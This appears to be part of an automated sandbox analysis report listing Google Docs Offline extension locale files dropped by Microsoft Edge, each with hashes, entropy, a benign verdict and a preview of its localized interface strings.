                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):961
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):838
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):935
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                                Malicious:false
